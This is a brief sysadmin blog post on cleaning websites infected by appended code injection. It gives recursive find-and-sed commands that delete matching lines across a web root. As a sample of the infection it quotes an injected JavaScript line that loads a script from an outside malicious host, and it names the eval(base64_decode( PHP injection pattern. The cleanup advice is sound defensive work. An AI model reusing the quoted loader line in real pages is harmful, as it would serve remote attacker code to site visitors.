Small blog about system administration.

HOWTO: Easy clean infected sites

When you experience code injection in your site and there is only appending of code to the end of your site files you can clean it with :

cd /var/www/vhosts/<your-domain-com>/httpdocs
find . -type f -exec sed -i ‘/oployau.fancountblogger.com/d’ {} \;

for lines like :

js/ac_runactivecontent.js:document.write(‘<s’+'cript type=”text/javascript” src=”http://oployau.fancountblogger.com:8080/Link.js”></scr’+'ipt>’);

or just

find . -name “*.php” -type f -exec sed -i ‘/eval(base64_decode(/d’ {} \;

if you want to check/repair only php files with base64 encoded injection.

Of course you need shell access for this or you can just request you hosting guys to do it for you.

No comments :

Post a Comment